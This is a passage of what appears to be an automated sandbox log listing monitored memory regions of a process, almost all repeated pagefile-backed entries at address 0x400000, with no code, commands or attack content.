"pagefile_0x0000000000400000" filename = "" Region: id = 5142 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5143 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5144 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5145 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5146 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5147 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5148 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5149 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5150 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5151 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5152 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5153 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5154 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5155 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5156 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5157 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5158 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5159 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5160 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5161 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5162 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5163 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5164 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5165 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5166 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5167 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5168 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5169 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5170 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5171 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5172 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5173 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5174 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5175 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5176 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5177 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5178 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5179 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5180 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5181 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5182 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5183 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5184 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5185 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5186 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5187 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5188 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5189 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5190 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5191 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5192 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5193 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5194 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5195 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5196 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5197 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5198 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5199 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5200 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5201 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5202 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5203 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5204 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5205 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5206 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5207 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 5208 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5209 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5210 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5211 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5212 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5213 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5214 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5215 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5216 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5217 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5218 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5219 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5220 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5221 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5222 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5223 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5224 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5225 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5226 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5227 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5228 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5229 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5230 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5231 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5232 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5233 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5234 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5235 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5236 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5237 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5238 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5239 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5240 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5241 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5242 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5243 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5244 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5245 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5246 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5247 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5248 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5249 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5250 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5251 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5252 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5253 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5254 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5255 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5256 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5257 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5258 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5259 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5260 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5261 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5262 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5263 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5264 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5265 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5266 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5267 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5268 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5269 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5270 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5271 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5272 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5273 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5274 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5275 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5276 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5277 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5278 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5279 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5280 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5281 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5282 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5283 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5284 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5285 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5286 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5287 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5288 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5289 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5290 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5291 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5292 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5293 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5294 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5295 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5296 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5297 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5298 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5299 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5300 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5301 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5302 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5303 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5304 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5305 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5306 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5307 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5308 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5309 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5310 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5311 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5312 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5313 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5314 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5315 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5316 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 5317 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5318 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5319 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 5320 start_va = 0x90d0000 end_va = 0x91c9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000090d0000" filename = "" Region: id = 5321 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5322 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5323 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5324 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5325 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5326 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5327 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5328 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5329 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5330 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5331 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 